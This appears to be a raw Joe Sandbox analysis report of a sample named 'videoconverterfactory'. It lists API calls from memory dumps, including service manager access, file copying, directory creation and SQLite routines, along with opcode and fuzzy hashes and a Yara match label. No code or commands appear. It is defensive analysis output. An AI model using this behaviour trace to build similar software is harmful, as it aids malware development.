                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 312c36b3a06433b50237f29373087343ad90e2aead52a154aece252fa8fe9cef
                                                                                                      • Instruction ID: 0c6cf0a13e544d1250551069b4c9a98cb55b75ea00e83d7dbfe988fdcd72ff88
                                                                                                      • Opcode Fuzzy Hash: 312c36b3a06433b50237f29373087343ad90e2aead52a154aece252fa8fe9cef
                                                                                                      • Instruction Fuzzy Hash: 9DD05E6860C1C08EC6111BB02F143B27F608216300B5820BBC0C2F2093C03C854BBB2F
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 33a50c7f1ba77d4b4e45af4cd815d42ab1e4dcf827d670273597094d8737c91f
                                                                                                      • Instruction ID: 4671ff151afe005ff32d1113959b2ea15d198d5837c009fe97aee26fa1719287
                                                                                                      • Opcode Fuzzy Hash: 33a50c7f1ba77d4b4e45af4cd815d42ab1e4dcf827d670273597094d8737c91f
                                                                                                      • Instruction Fuzzy Hash: 3CD01770A04108CFCB04CFA8E994AAD77B0BB09300F20407EE023B7292D7395849CA2A
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889721586-0
                                                                                                      • Opcode ID: 4fce05a2aecd0fd816710fe21629de41e2a4365f00b6bb562a93242a9452cde1
                                                                                                      • Instruction ID: 06d02c972e80e358b0e68a9aeb4a199014787f64cdd3e6f27c2e769f8af19076
                                                                                                      • Opcode Fuzzy Hash: 4fce05a2aecd0fd816710fe21629de41e2a4365f00b6bb562a93242a9452cde1
                                                                                                      • Instruction Fuzzy Hash: 6DC08CA480820AEEC7400A904ED887A359C62053087704037EA4BB20C0C63C084EE1BE
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CopyFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1304948518-0
                                                                                                      • Opcode ID: cf4a72921bc3948d6a58ceb73e5a51018bb366a8127eab82c727b19e0eb5c253
                                                                                                      • Instruction ID: 5830152bc81dadf39048558d2d473c3636cf6b5f0827cdce240662b1f189e88d
                                                                                                      • Opcode Fuzzy Hash: cf4a72921bc3948d6a58ceb73e5a51018bb366a8127eab82c727b19e0eb5c253
                                                                                                      • Instruction Fuzzy Hash: 39C09B3150810AEFD31486518E4C6F5765C5B0978072444779D0BF60D0D63C454D653E
                                                                                                      APIs
                                                                                                      • CloseServiceHandle.ADVAPI32(?,?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D785
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleService
                                                                                                      • String ID:
                                                                                                      • API String ID: 1725840886-0
                                                                                                      • Opcode ID: 172bdecedbd0935caffae408475e28bf81b9defc2be3a6aecb54850ecd2a8002
                                                                                                      • Instruction ID: 4b6f7c2e31fd775f2e93b35ca9f2aa5c80254df26e3c4ffd181d32aceaf6e24a
                                                                                                      • Opcode Fuzzy Hash: 172bdecedbd0935caffae408475e28bf81b9defc2be3a6aecb54850ecd2a8002
                                                                                                      • Instruction Fuzzy Hash: 14B09B35554106EDC7D506D5485557A7E606B04710F300516DB02794D453775055F75D
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNELBASE ref: 00401E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 4241100979-0
                                                                                                      • Opcode ID: d550fd07844c3d1a2baddfd92bc6ac1c762443bbba06a6917c00f01dc53cca72
                                                                                                      • Instruction ID: 59bfbf43eebea8667676f86c4a0b11b8da1e31a275978166a459519321614bd5
                                                                                                      • Opcode Fuzzy Hash: d550fd07844c3d1a2baddfd92bc6ac1c762443bbba06a6917c00f01dc53cca72
                                                                                                      • Instruction Fuzzy Hash: 6FC09B71559514DAD64457D0DF4E99CB1685B04300B3100B77646710D18AFC05899AAF
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CopyFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1304948518-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 1586166983-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D30620: OpenEventA.KERNEL32(00100002,00000000,00000000,5FC9B7BF), ref: 02D306C0
                                                                                                        • Part of subcall function 02D30620: CloseHandle.KERNEL32(00000000), ref: 02D306D5
                                                                                                        • Part of subcall function 02D30620: ResetEvent.KERNEL32(00000000,5FC9B7BF), ref: 02D306DF
                                                                                                        • Part of subcall function 02D30620: CloseHandle.KERNEL32(00000000,5FC9B7BF), ref: 02D30714
                                                                                                      • TlsSetValue.KERNEL32(0000002B,?), ref: 02D311BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseEventHandle$OpenResetValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 1556185888-0
                                                                                                      APIs
                                                                                                      • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040D83A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 1586166983-0
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0040D5AF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      APIs
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                                        • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                                      • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                                      • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                                      • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                                      • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                                      • memcmp.MSVCRT ref: 60967D4C
                                                                                                      • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                                      • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                                      • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                                      • sqlite3_free.SQLITE3 ref: 60968002
                                                                                                        • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                        • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                        • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                        • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                        • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                                      • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                                      • sqlite3_step.SQLITE3 ref: 60968139
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                                        • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                                        • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                                        • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                                        • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                                      • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                                      • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                                      • sqlite3_free.SQLITE3 ref: 60969102
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                                      • String ID: $d
                                                                                                      • API String ID: 2451604321-2084297493
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                                      • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                                      • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                                      • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                                      • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                                      • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                                        • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                        • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                        • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                      • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                                      • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                                      • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                                      • String ID: optimize
                                                                                                      • API String ID: 1540667495-3797040228
                                                                                                      • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                                      • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                                      • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                                      • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
APIs
• sqlite3_finalize.SQLITE3 ref: 60966178
• sqlite3_free.SQLITE3 ref: 60966183
• sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
• sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
• sqlite3_value_text.SQLITE3 ref: 60966236
• sqlite3_value_int.SQLITE3 ref: 60966274
• memcmp.MSVCRT ref: 6096639E
  • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
  • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
• sqlite3_mprintf.SQLITE3 ref: 60966B51
• sqlite3_mprintf.SQLITE3 ref: 60966B7D
  • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
  • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
Similarity
• API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
• String ID: ASC$DESC$x
• API String ID: 4082667235-1162196452
• Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
• Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
• Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
• Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
APIs
• sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
• sqlite3_step.SQLITE3(?,?), ref: 609693B0
• sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
  • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
  • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
  • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
  • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
• sqlite3_reset.SQLITE3(?,?), ref: 609693F3
• sqlite3_malloc.SQLITE3(?), ref: 60969561
• sqlite3_malloc.SQLITE3(?), ref: 6096958D
• sqlite3_step.SQLITE3(?), ref: 609695D2
• sqlite3_column_int64.SQLITE3(?), ref: 609695EA
• sqlite3_reset.SQLITE3(?), ref: 60969604
• sqlite3_realloc.SQLITE3(?), ref: 609697D0
• sqlite3_realloc.SQLITE3(?), ref: 609698A9
  • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
• sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
• sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
• sqlite3_step.SQLITE3(?,?), ref: 60969A75
• sqlite3_reset.SQLITE3(?,?), ref: 60969A80
• sqlite3_free.SQLITE3(?), ref: 60969D41
• sqlite3_free.SQLITE3(?), ref: 60969D4C
• sqlite3_free.SQLITE3(?), ref: 60969D5B
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
Similarity
• API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
• String ID:
• API String ID: 961572588-0
• Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
• Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
• Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
• Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
• String ID: 2$foreign key$indexed
• API String ID: 4126863092-702264400
• Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
• Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
• Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
• Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
APIs
• sqlite3_bind_int64.SQLITE3 ref: 6094A72B
• sqlite3_step.SQLITE3 ref: 6094A73C
• sqlite3_column_blob.SQLITE3 ref: 6094A760
• sqlite3_column_bytes.SQLITE3 ref: 6094A77C
• sqlite3_malloc.SQLITE3 ref: 6094A793
• sqlite3_reset.SQLITE3 ref: 6094A7F2
• sqlite3_free.SQLITE3(?), ref: 6094A87C
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
